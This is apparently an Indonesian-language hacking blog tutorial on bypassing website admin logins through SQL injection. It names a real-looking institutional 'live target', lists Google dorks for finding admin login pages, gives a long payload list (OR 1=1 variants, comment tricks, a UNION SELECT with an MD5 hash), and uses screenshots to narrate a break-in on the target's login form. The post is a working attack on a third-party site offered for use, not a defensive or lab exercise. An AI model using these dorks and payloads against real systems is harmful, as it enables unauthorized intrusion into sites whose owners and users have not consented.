Harusnya mudah2 saja rek,
kuncinya Harus SABAR ..
Banyak loh yang ngomong, jadi HACKER itu tidak instan kayak mie instant
, butuh kesabaran , blablabla.. ( males bacot )
langsung aja yo...
LIVE TARGET : http://pmdk.polban.ac.id/userSekolah/
DORK :
login | logon
inurl:"/admin/ site:
inurl:"/admin/ intext:"login" site:
inurl:"/admin/login.php site:
inurl:"/admin/login.php intext:"login" site:
intitle:"admin login" site:
dan msh banyak lagi...
Dan Ini Untuk Bypassnya :D
' OR 1=1 --
' OR 1=1
' OR '1'='1'
' OR 'a' = 'a
' or 0=0 #
' or 'x'='x
' or a=a--
'or'1=1'
' or 0=0 --
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
') or ('a'='a
' or 1=1--
' or 'x'='x
' or 0=0 #
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
==
and 1=1--
and 1=1
1') and '1'='1--
admin' --
admin' #
admin'/*
) or '1'='1--
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
" or 1=1--
" or 0=0 #
") or ("a"="a
" OR 1=1
" OR "1"="1
1' OR 1=1
1' OR '1'='1'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
or 0=0 #
or 0=0 --
or 0=0 #
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
//Selesai..
//>
<//
//>
<//
//>
<//
//>
<//
//>
<//
//>
<//
//>
<//
//>
<//
===========================
ATTENTION:
Ini hanya trik ,
Misalnya, ada yg punya kasus kyk gini :
Gambar 1 :
kita mencoba injek form login dgn query seperti dibawah ini..
![[Image: Screenshot_2.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vwQlXd1bqxufSMMkJx9wFkgreL9bVi4dc3-p1ivqbfyWaeW6ZMmf_DhL5wXK4xIwop3zCQ7pki4LJjqhVRCGAN6Pr7T8Ye7rbfLM0H-INBKUBKgsShBcBahqU=s0-d)
Gambar 2 :
dan hasil menunjukkan Database Error ,
![[Image: Screenshot_3.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tLaq2gn1v8PYdeQhBuVpjKFpDTfX0aDmHiuybEfgT0gYY3QkABT3JsHRkgF2xi7K7eTlhVHBSAkrOWW4lBRDmQGYJeqj1TCxPYcTS1gfyC6URrJmY74yljO4o=s0-d)
Kenapa bisa begitu?
Itu karena query yg saya masukkan (pada Gambar 1) tidak sama dgn kodingan form login tsb..
Jngan sedih dulu ya mblo,, cewe msh banyak ko' ,
mau yg mana ?
yg ini ..
Hahahaha,,
Back to topic..
Dgn error kyk gitu, itu menunjukkan bhwa Web tsb Vuln SQL injection bypass
Gambar 3 :
Jalan satu2 nya, adalah mengganti query injeksi nya, #Ojok nyerah lek totok kene
hehehe...![[Image: Screenshot_4.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v6AFZPSf8iiBO6WtGrfQ6fiQIIeF2wmKiMlwPTTUSmhFHZk8ywmR154vrXIdUpW4CeVNyvPLl41DlNYiCwP61IhB4C6KYbywQE8m0jddpj7DHKe5u2PSUbndQ=s0-d)
Jebret...
Gambar 4 :
![[Image: Screenshot_5.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sT9cj5ahgLdiWDGhaAik-QK3F8F3_VZsVx8k4qt-ur6LsPVEUpG_Q5MPjP-xpt2iyeCgVOk_c4qYO2yxyNu8Fn_uOjRTyi-_CqFHtkOVGbU7QBqyt71QMd-2A=s0-d)
GOAL!!